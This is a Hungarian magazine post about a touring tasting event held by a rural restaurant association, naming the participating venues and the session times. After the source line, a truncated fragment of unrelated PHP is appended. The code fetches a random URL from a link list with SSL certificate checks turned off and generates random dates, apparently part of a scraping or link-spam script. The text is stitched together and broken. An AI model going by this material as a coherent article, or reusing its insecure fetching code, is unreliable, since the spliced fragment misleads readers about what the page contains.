-->

Ilyen a stílusos vidéki vendéglátás

6 SVÉTterem, 12 étel, 1 világnézet – február 17-én tavaszváró programot szerveznek a Stílusos Vidéki Éttermiség Egyesület éttermei több helyszínen is az országban. Az éttermek az ikonikussá vált ételeik közül mutatnak be két-két fogást. A részletes menüsort később közlik. A rendezvényen az alábbi stílusos vidéki éttermek vesznek részt: Kistücsök Étterem (Balatonszemes) Erhardt Étterem (Sopron) Viator... Tovább..


6 SVÉTterem, 12 étel, 1 világnézet – február 17-én tavaszváró programot szerveznek a Stílusos Vidéki Éttermiség Egyesület éttermei több helyszínen is az országban.

Az éttermek az ikonikussá vált ételeik közül mutatnak be két-két fogást. A részletes menüsort később közlik.

A rendezvényen az alábbi stílusos vidéki éttermek vesznek részt:

  • Kistücsök Étterem (Balatonszemes)
  • Erhardt Étterem (Sopron)
  • Viator Étterem és Borbár (Pannonhalma)
  • Macok Bisztró és Borbár (Eger)
  • Nomád Hotel és Glamping (Noszvaj)
  • Rosinante Étterem és Hotel (Szigetmonostor)

Szigetmonostoron, a Rosinante Fogadóban öt év után kerül sor újra SVÉT programra. A rendezvényre a belépés ingyenes, de regisztrációhoz kötött. A vendégeket három turnusban fogadják:
12.00 Első turnus
14.00 Második turnus
16.00 Harmadik turnus

A rendezvény a fogadó fűtött, belső helyiségeiben zajlik, de a program idejére a kertben felállított sátrat is fűthetővé varázsolják. A gyerekeket animátorok várják az Íz-Lelő Ínyenc Játszóházban, valamint helyi ízek kóstolójára is sor kerül a Szigeti termelői standnál. A jó hangulatról a szakácsok mellett Szekeres Tamás, azaz D.J T-Boy gondoskodik.

A Stílusos Vidéki Éttermiség (SVÉT) rendezvényei egyre népszerűbbek az országban. Az egyesület egyik legaktívabb tagját, a palkonyai PalKonyha tulajdonosát, Pauli Zoltánt a vidéki élet szépségeiről és a SVÉT terveiről kérdeztük a VinCE Magazin januárban megjelent különszámában.

Az öt éve megalakult Stílusos Vidéki Éttermiség (SVÉT) Egyesület chefjei a szívből jövő vidéki vendéglátásban hisznek. A jelenleg 16 tagot számláló baráti, érdekvédelmi szövetség nem titkolt célja, hogy a vidék gasztronómiáját vonzóvá tegyék a városi emberek számára, ezért az ételek készítésekor a minőséget, a regionális alapanyagok használatát és a szezonalitást tartják szem előtt. A háttérben fontos szakmai munka folyik, a szakácsok napi kapcsolatban állnak egymással, és tudásukat nemcsak otthon, saját éttermeikben mutatják meg, hanem a rendszeresen megrendezett közönségtalálkozókon is. A SVÉT tagjai nagyon fontosnak tartják az utánpótlás nevelését, ezért hamarosan létrehozzák a SVÉT Akadémiát, amelynek keretében a szakácstanulók, vagy frissen végzett szakácsok vidéki gyakorlati ösztöndíjprogramját is megszervezik.

További részletek a SVÉT honalpján.

The post Ilyen a stílusos vidéki vendéglátás appeared first on VinCE Magazin.


Source: Vincemagazin HU


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>